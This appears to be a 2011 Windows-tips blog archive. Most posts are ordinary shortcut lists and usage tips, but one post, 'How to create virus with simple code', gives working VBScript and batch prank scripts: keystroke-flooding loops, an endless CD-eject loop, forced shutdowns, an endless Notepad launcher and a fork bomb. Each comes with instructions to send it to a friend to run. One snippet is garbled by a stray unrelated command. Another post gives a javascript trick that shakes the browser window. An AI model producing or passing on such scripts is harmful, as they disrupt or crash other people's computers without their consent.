Monday, 28 February 2011

Some Shortcut keys for VLC media player


General Shortcut Keys
Keys                                                        Functions      
[T]                                                            Show time Played/time left
[Ctrl] + [Q]                                              Quit program
[F]                                                            Full screen mode
[Ctrl] + [P]                                               Playlist
[Ctrl] + [M]                                              Messages
[Ctrl] + [I]                                                Stream and Media info
[Ctrl] + [A]                                              Open capture device
[Ctrl] + [W]                                             Streaming and Transport Wizard
[Ctrl] + [X] / [Ctrl] + [Q]                         Exit
[Ctrl] + [V]                                              VLM control
[Ctrl] + [G]                                              Extended GUI
[Ctrl] + [B]                                               Bookmarks
[Ctrl] + [S]                                               Preferences
[F]                                                            Full screen
[+]                                                            Play faster
[-]                                                             Play slower
Video Playback Shortcut Keys             
[Space]                                                     Play/pause
[S]                                                            Stop
[N]                                                            Next entry in playlist
[F]                                                            Full screen
[Ctrl] + [O]                                              Quick open file
[Ctrl] + [O]                                              Open directory
[Ctrl] + [D]                                              Open disk
[Ctrl] + [N]                                              Open network stream
[N]                                                            Next item
[P]                                                            Previous item
[Shift] + [Left Arrow]                             Very Short Backwards jump
[Shift] + [Right Arrow]                           Very Short Forward jump
[Alt] + [Left arrow]                                 Backwards jump
[Alt] + [Right arrow]                               Forward jump
[Ctrl] + [Left arrow]                               Medium backwards jump
[Ctrl] + [Right arrow]                             Medium forward jump
[Alt] + [Ctrl] + [Left arrow]                    Long backwards jump
[Alt] + [Ctrl] + [Right Arrow]                 Long Forward jump
[Enter]                                                     Active
Audio Playback                                      
[M]                                                           Mute On/Off
[Ctrl] + [Up arrow]                                 Turn Volume up
[Ctrl] + [Down arrow]                            Turn Volume Down
[Ctrl] + [Up arrow]                                 Volume Up
[Ctrl] + [Down arrow]                            Volume Down
[Ctrl] + [H]                                              Subtitle Delay Up
[Ctrl] + [J]                                               Subtitle Delay Down
DVD Playback                                      
[Ctrl] + [M]                                              Go to DVD menu
[Ctrl] + [P]                                               Selected previous DVD title
[Ctrl] + [F]                                               Selected next DVD title
[Ctrl] + [U]                                              Selected previous DVD chapter
[Ctrl] + [D]                                              Selected Next DVD Chapter

Some Useful Shortcut keys for windows media player

Shortcut










Function
ALT+1
Zoom to 50 percent
ALT+2
Zoom to 100 percent
ALT+3
Zoom to 200 percent
ALT+ENTER
Show video in full screen
ALT+LEFT ARROW
Switch to previous view (same as Back button)
ALT+RIGHT ARROW
Switch to next view (same as Forward button)
CTRL+1
Switch to full mode
CTRL+2
Switch to skin mode
CTRL+7
Switch to the first view in a media category after Recently Added, such as Artist in Music
CTRL+8
Switch to the second view in a media category after Recently Added, such as Album in Music
CTRL+9
Switch to the third view in a media category after Recently Added, such as Songs in Music
CTRL+B
Play the previous item
CTRL+E
Move the focus to the search box in the library
CTRL+F
Play the next item
CTRL+H
Turn shuffle on or off
CTRL+J
Eject CD or DVD (except on computers with two or more CD or DVD disc drives)
CTRL+M
Show or hide the Classic Menus (menu bar) in full mode
CTRL+N
Create a playlist
CTRL+O
Open a file
CTRL+P
Play or pause a file
CTRL+S
Stop playback
CTRL+SHFT+B
Rewind video
CTRL+SHFT+C
Turn captions and subtitles on or off
CTRL+SHFT+F
Fast-forward through video or music
CTRL+SHFT+G
Play faster than normal speed (time compression)
CTRL+SHFT+N
Play at normal speed
CTRL+SHFT+S
Play slower than normal speed (time expansion)
CTRL+T
Repeat the playlist
CTRL+U
Specify either a URL or path of a file
CTRL+W
Close or stop playing a file
F1
Open Help
F10
Show the Classic Menus (menu bar)
F11
Switch to full-screen mode
F2
Edit media information on a selected item in the library
F3
Add media files to the library
F4
Change how items are displayed in the Details pane by using the options available with the View Options button
F5
Refresh information in the panes
F6
Increase the size of album art
F7
Mute the volume
F8
Decrease the volume
F9
Increase the volume
SHFT+F6
Decrease the size of album art

Thursday, 24 February 2011

How to make Browser Freak Out




ATTENTION: 
You can try the tricks below in Internet Explorer an Mozilla Firefox. In browsers like Google Chrome or Opera they might not work.(only internet explorer)

1) Open any web page in your browser.
2) Delete everything in the address bar.

javascript:function Shw(n) {if (self.moveBy) {for (i = 35; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} Shw(6)-accident

3) Copy the following javascript and paste it in the address bar and Hit enter.

Wednesday, 23 February 2011

How to create folder name which can't be created Normally


Folders with name: CON, PRN, AUX, CLOCK$, NUL, COM1, COM2, COM3, COM4, COM5,COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, & LPT9 can’t be created using Windows Explorer or Command Prompt directly!
( Try this out.. right click on your desktop and try creating folder named "con"it changes back to "new Folder") )

Try this: CREATION


Syntax:md \\.\\$path
Example:prompt>md \\.\\C:\con
Explanation: This would create a folder named "con" on your "C Drive"

Similarly to delete such folder:
DELETION
Syntax:rd/s \\.\\$path
Example:prompt>rd/s \\.\\C:\con
Explanation: This would remove the folder named "con"!
Note: rd(Remove Directory) command is used with "/s" switch as otherwise it
would give error that "folder is not empty"!

On another hand...if you ever wondered how to create a folder with no name...then try this:

Create a New Folder from Windows Explorer
Select rename & type: "ALT+255"  or type: ALT+0160(Use Numpad)..thats it!

Monday, 21 February 2011

How to Record Every Step to explain any problem or solution


You can easily do by using the problem step recorder
To start Problem Step Recorder click on the window button and enter psr or psr.exe and press enter key.
After you press enter you will see application with the options to Start the recording enabled and the rest of the options disabled.
Now click on the Start Record button and it will start recording your mouse clicks and key press i.e. every time mouse is clicked it will take the screenshot of the current window.
After completing click on the stop record button. You can also add comments wherever you feel by clicking on the add comments button.

When click on stop record you will be asked to save the file. Give it a name and save it. this file be in zipped format which can be easily sent via email.

Monday, 14 February 2011

Some Useful Unknown Mouse tips




Select with double and triple click

Any word can be selected by double-clicking the word. If you want to highlight the whole paragraph, click the mouse button three times on any text in the paragraph.

Use the right-click

Tip: If you right-click on any file or text and drag it while continuing to hold the right button, when you let go you will be given the option to move or copy that file or text. This saves you the extra step of having to right-click where you want to paste the item

Tip: While in a browser pressing and holding Ctrl while clicking on any link will open that link in a new tab.


Wednesday, 9 February 2011

How to create virus with simple code





1) Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :
Code:

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop 

Save it as "Anything.VBS" and send it.

2) Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!
Type :
Code:


Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop 

Save it as "Anything.VBS" and send it.

3) Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type :
Code:


MsgBox "Your PC is Hack"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Save it as "Anything.VBS" and send it.

4) Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Type :

Code:

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

Save it as "Anything.VBS" and send it.

5) Code to shutdown computer

Open NotePad And Write This:
Code:
avidemux2_cli --run j-1.js --run j-2.js --end
shutdown.exe -s -t 00

                  OR
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.bat" and send it.

6) Open Notepad continually in your friend's computer:
Open NotePad And Write This:
Code:

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as "Anything.BAT" and send it.

7) code for make a Fork Bomb(LoL)
Open NotePad And Write This:
Code:
start
%0
goto :S

Save it as "Anything.BAT" and send it.

If You Open It,  It Can Crash Your Pc So Send It In YOUR FRIENDS .. Not to ME ^_^ .

Twitter Bird Gadget